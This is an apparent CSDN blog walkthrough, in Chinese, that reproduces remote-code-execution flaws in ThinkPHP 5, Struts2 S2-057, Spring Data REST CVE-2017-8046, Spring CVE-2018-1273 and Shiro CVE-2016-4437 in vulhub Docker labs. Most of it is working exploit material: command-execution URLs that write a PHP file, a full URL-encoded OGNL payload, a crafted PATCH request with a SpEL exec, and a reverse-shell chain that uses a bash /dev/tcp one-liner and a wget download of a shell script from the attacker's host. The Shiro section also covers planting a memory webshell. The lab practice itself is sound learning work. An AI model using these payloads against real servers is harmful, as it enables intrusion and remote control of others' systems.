常见框架漏洞复现

标签：65% 框架 6f% 漏洞 6e% 74% 63% 2e% 复现

环境

使用Debian虚拟机，配置docker与docker-compose

apt install docker.io

apt install docker-compose

配置后下载vulhub靶场

git clone https://github.com/vulhub/vulhub.git

后发现，环境还是无法启动成功，重新打开终端输入docker hub加速服务

sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<EOF
{
    "registry-mirrors": [
        "https://docker.anyhub.us.kg",
        "https://dockerhub.icu",
        "https://docker.awsl9527.cn"
    ]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

如图成功后，启动容器 ，成功

若想更改端口，则vim docker-compose.yml进入更改

Thinkphp

进入vulhub/thinkphp/5-rce目录下，docker-compose up -d 启动环境，访问(默认端口8080)

方法一

拼接路径，查看用户

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

将system替换为phpinfo，whoami替换为-1，打开探针

拼接，生成木马获取shell(演示使用探针演示)，文件在根目录下，访问

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

方法二

 利用工具获取shell，利用蓝鲸thinkphp工具扫描，发现存在漏洞

选择漏洞查看命令是否能执行(第一个与第三个不支持命令)

自己写入木马后，点击getshell后，使用蚁剑测试连接(默认的木马没连上)

struts2(Apache)

S2-057远程执行代码漏洞

进入vulhub/struts2/s2-057目录下，docker-compose up -d 启动环境，拼接/struts2-showcase访问

拼接访问/struts2-showcase/${(123+123)}/actionChain1.action

刷新后可以看到中间实在位置相加了，刷新页面抓包，发送到重放器

将register2改为actionChain1发送，查看响应为302

然后将数字位置改为如下，发送，出现root

%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

 进入vulhub/spring/CVE-2017-8046目录下，docker-compose up -d 启动环境，拼接路径/customers/1访问，刷新使用BP抓包

将抓包文件换为以下，更换为自己的ip与端口，放完包

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193

[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]

查看开启环境的机器，查看docker开启镜像id

docker ps

使用以下两条命令，发现success

docker exec -it c9a1b028f320 /bin/bash

ls /tmp

spring代码执行(CVE-2018-1273)

进入vulhub/spring/CVE-2018-1273目录下，docker-compose up -d 启动环境，拼接路径/users访问，随便输入用户名密码后使用BP抓包

 将下面替换为以下，在重放器发送，显示500，并且id显示created创建成功

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

如上一个CVE-2017-8046一样返回靶场查看，zcc文件已创建

物理机www下写下反弹shell脚本ip为监听机器ip，port为监听端口

bash -i >& /dev/tcp/ip/port 0>&1

将抓包中touch /tmp/zcc改为以下(写下脚本的目录)，发送成功

/usr/bin/wget -qO /tmp/shell.sh http://ip/111.sh

查看靶场文件是否写入，写入成功

物理机使用工具开启端口监听

BP中再更改命令为打开文件(如下)，还是touch /tmp/zcc位置，发送

/bin/bash /tmp/shell.sh

监听成功

Shiro

进入vulhub/shiro/CVE-2016-4437目录下，docker-compose up -d 启动环境，访问

先验证Shiro框架(Shiro框架特征：响应包中存在字段set-Cookie: rememberMe=deleteMe)

使用BP抓包，添加字段，在重放器发送，发现响应包中存在set-Cookie: rememberMe=deleteMe

Cookie: rememberMe=123

使用shiro反序列化工具，填入地址，点击检测当前密钥，发现存在shiro框架

点击爆破密钥，得到密钥

点击检测当前利用链，得到利用链(若未得到爆破利用链)

来到命令执行，输入whoami执行，得到用户名

来到内存马，生成木马(注意：密码为字母与数字)，打开哥斯拉测试连接(将asp改为jsp)，成功

此次漏洞复现完毕，欢迎指出错误和讨论

标签：65%,框架,6f%,漏洞,6e%,74%,63%,2e%,复现
From： https://blog.csdn.net/2401_86440467/article/details/140992143